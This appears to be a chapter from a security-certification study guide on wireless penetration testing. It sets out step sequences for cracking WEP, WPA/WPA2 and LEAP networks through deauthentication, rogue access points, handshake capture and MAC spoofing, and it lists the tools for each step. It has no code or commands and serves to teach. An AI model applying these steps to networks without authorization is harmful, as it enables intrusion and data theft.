Exam Focus: Examine Wireless Penetration Testing Framework. Objective includes:


Understand Wireless penetration testing.
Examine Wireless Penetration Testing Framework.
Wireless penetration testing
Wireless penetration testing is used to actively evaluate information security measures
implemented in a wireless network. It is used to analyze design weaknesses, technical flaws, and
vulnerabilities. It is required due to the following reasons:






Threat assessment: The wireless threats faced by the information assets of an
organization are identified.
Upgrading infrastructure: Existing infrastructure of software, hardware, or network
design are changed or upgraded.
Risk prevention and response: Comprehensive approach of preparation steps for
preventing upcoming exploitation are provided.
Security control auditing: The efficiency of wireless security protections and controls is
to be tested and evaluated.
Data theft detection: Streams of sensitive data are found by sniffing the traffic.
Information system management: Information on security protocols, network strength,
and connected devices is collected.
In wireless penetration testing, a penetration tester needs to take the following steps:





Wireless Discovery
Packet Capturing
Attacking WEP/ WPA Password
Generating frames using frame generation software
Using IDS tools
Wireless penetration testing framework
Wireless penetration testing framework includes the following steps:
1. Discover wireless devices. Document all the findings if a wireless device is found.
2. Perform a general Wi-Fi network attack and check whether the wireless device found
uses WEP encryption or not if the wireless device is using a Wi-Fi network.
3. Perform WEP encryption pen testing or check whether WLAN uses WPA/WPA2
encryption or not if WLAN uses WEP encryption.
4. Perform WPA/WPA2 encryption pen testing or check whether WLAN uses LEAP
encryption or not if WLAN uses WPA/WPA2 encryption.
5. Perform LEAP encryption pen testing or check whether WLAN is unencrypted or not if
WLAN uses LEAP encryption.
6. Perform unencrypted pen testing or else perform Wi-Fi network attack if WLAN is
unencrypted.
General penetration steps for all wireless networks
The following are general penetration steps for all wireless networks:
1. Create a rogue access point. Use tools such as Karma, Hotspotter, Airsnarf, etc. to
deauthenticate the client and then check for client deauthentication.
2. If the client is deauthenticated, take the following steps:
1. Associate with the client.
2. Sniff the traffic.
3. Check if passphrase/certificate is acquired, or else deauthenticate the client again.
3. If passphrase is acquired, use the wzcook tool to crack the passphrase for stealing
confidential information, or else deauthenticate the client again.
Pen testing LEAP encrypted WLAN
Pen testing LEAP encrypted WLAN includes the following steps:
1. Use tools such as Karma, Hotspotter, Airsnarf, etc. to deauthenticate the client.
2. If the client is deauthenticated, use tools such as asleap, THC-LEAP Cracker, etc. to
break the LEAP encryption for stealing confidential information or else deauthenticate
the client again.
Pen testing WPA/WPA2 encrypted WLAN
Pen testing WPA/WPA2 encrypted WLAN includes the following steps:
1. Use tools such as Karma, Hotspotter, Airsnarf, etc. to deauthenticate the client.
2. If the client is deauthenticated, take the following steps:
1. Sniff the traffic.
2. Check the status of capturing EAPOL handshake or else deauthenticate the client
again.
3. If EAPOL handshake is captured, use tools such as coWPAtty, Aircrack-ng, etc. to
perform WPA/WPA2 dictionary attack for stealing confidential information or else
deauthenticate the client again.
Pen testing WEP encrypted WLAN
Pen testing WEP encrypted WLAN includes the following steps:
1. Check if the SSID is visible or hidden.
2. Sniff the traffic and check the status of packet capturing if SSID is visible.
3. If the packets are captured/injected, use tools such as Aircrack-ng, Airsnort, WEPcrack,
etc. to break the WEP key or else sniff the traffic again.
4. If SSID is hidden, take the following steps:
1. Use tools such as Airplay-ng, Commview, Void11, etc. to deauthenticate the
client.
2. Associate the client.
3. Follow the procedure of visible SSID.
Pen testing unencrypted WLAN
Pen testing unencrypted WLAN includes the following steps:
1. Check if the SSID is visible or hidden.
2. Sniff for IP range and check the status of MAC filtering if SSID is visible.
3. If MAC filtering is enabled, use tools such as SMAC to spoof valid MAC or use IP
within the discovered range to connect to the AP.
4. If SSID is hidden, use tools such as Airplay-ng to discover the SSID and follow the
procedure of visible SSID.
Capture a wireless network's packets
An attacker captures the packets from a wireless network and analyzes those packets to perform
attacks. The following tools are used to capture a wireless network's packets:



Airopeek
Airtraf
Apsniff


Cain
Wireshark
WEP/WPA password attacking tools used in wireless penetration
The WEP/WPA password attacking tools used in the wireless penetration testing steps are as
follows:








Aircrack-ptw
Aircrack-ng
Aircrack
Airsnort
coWPAtty
wep attack
wep crack
Airbase
Frame generation software used in wireless penetration
The various frame generation software used in wireless penetration are as follows:







Airgobbler
airpwn
Airsnarf
Commview
fake ap
void 11
wifi tap
IDS tools used in wireless penetration
The IDS tools used in wireless penetration are as follows:





WIDZ
War Scanner
Snort-Wireless
AirDefense
AirMagnet
Chapter Summary
In this chapter, we learned about wireless networks, various types of wireless networks, Wi-Fi
authentication modes, and types of wireless encryption. This chapter focused on wireless hacking
methodology, Bluetooth hacking, and Wireless penetration testing.
Glossary
Ad hoc
Ad hoc is a basic topology of a wireless network. An ad hoc network consists of two or more
wireless devices that communicate directly with each other.
Infrastructure network
An infrastructure network consists of an access point that connects wireless devices to the
standard cable network.
MAC filtering
MAC filtering is a security access control technique that allows specific network devices to
access or prevent them from accessing the network.
Service Set Identifier
Service Set Identifier is used to identify a wireless network. SSIDs are case sensitive text strings
and have a maximum length of 32 characters.
Warchalking
Warchalking is the drawing of symbols in public places to advertise an open Wi-Fi wireless
network.
Wardriving
Wardriving is a technique used to locate insecure wireless networks while driving around.
Warwalking
Warwalking is the act of walking around with a Wi-Fi enabled laptop to get an access point for a
wireless network.
Wireless intrusion prevention system
Wireless intrusion prevention system (WIPS) monitors the radio spectrum for the presence of
unauthorized, rogue access points and the use of wireless attack tools.
Wireless network
A wireless network refers to any type of computer network that is wireless, and is commonly
associated with a telecommunications network whose interconnections between nodes are
implemented without the use of wires.
WMAN
WMAN represents a wireless network that connects two or more wireless LANs in the same
geographical area.
WPAN
WPAN is a wireless personal area network that interconnects devices centered on an individual
person's workspace.